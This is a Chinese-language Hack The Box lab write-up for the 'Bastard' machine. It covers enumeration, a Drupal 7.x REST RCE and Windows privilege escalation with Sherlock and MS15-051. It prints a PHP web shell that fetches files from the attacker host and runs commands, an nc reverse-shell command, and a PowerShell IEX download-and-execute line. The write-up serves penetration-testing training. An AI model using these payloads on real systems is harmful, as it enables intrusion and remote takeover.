HTB系列之七：Bastard

这次挑战的是 HTB 的第7台靶机：Bastard

技能收获：

• PHP Unserilaize
• CMS Version Identify
• Windows privilege escalation ：Sherlock

信息收集

基本信息

Bastard IP：10.10.10.9

Kali IP：10.10.14.23

端口枚举

nmap -A -p- -v -T4 10.10.10.9

发现开启了80(IIS)，访问之

看起来是drupal cms，访问 robots.txt ，发现版本变更文件

版本：Drupal 7.54

漏洞发现

searchsploit drupal 7.x

该版本存在 rce ，编辑 exploit

该exploit会攻击由服务扩展创建的REST端点，我们只需要找出REST端点的名称即可利用该漏洞。

通过目录枚举，我们发现 endpoint 为 /rest，用其替换exploit

gobuster -q dir --url http://10.10.10.9 -t 50 --wordlist ./word.txt

漏洞利用

php exp.php

没有反应，挂上 burpsuite 看看

设置 exp 的target为 burp 的监听端口

依然没回应，那应该是缺少php包，未成功发送

检查发现，Kali缺少 php-curl 包，安装好成功返回响应并写入 shell.php

apt install php-curl

利用 session.json 可以伪造会话，成功登录

已知目标是 x64 的系统，我们上传 nc.exe

下载地址：https://eternallybored.org/misc/netcat/

给 exp 添加一个文件上传功能，也可以使用 smb文件共享，使用 copy \\ip\nc64.exe nc.exe上传

35 $phpmine = <<<'EOD'
 36 <?php
 37 if(isset($_GET['fupload'])){
 38  file_put_contents($_GET['fupload'],file_get_contents("http://10.10.14.15:8000/".$_GET['fupload']));
 39 };
 40 if(isset($_GET['fexec'])){
 41  echo "<pre>" . shell_exec($_GET['fexec']) . "</pre>";
 42 };
 43 ?>
 44 EOD;
 45 
 46 $file = [
 47     'filename' => 'cmd.php',
 48     'data' => $phpmine
 49 ];

10.10.10.9/233.php?fupload=nc64.exe&fexec=nc64.exe -e cmd 10.10.14.15 4444

权限提升

git clone git clone https://github.com/rasta-mouse/Sherlock.git

Sherlock是一个在Windows下用于本地提权的PowerShell脚本

http://10.10.10.9/cmd.php?fexec=echo IEX(New-Object System.Net.Webclient).DownloadString('http://10.10.14.15:8000/Sherlock.ps1') | powershell -noprofile -

提示 ms15-051 , 利用之

提权程序下载地址：https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip

上传并运行

建立 nc 会话

至此完成

参考文章

Drupal 7.x RCE 漏洞分析 附EXP：

https://www.xctf.org.cn/library/details/58bd0f2c4d4c77aef7d15787cb65008a6533b87a/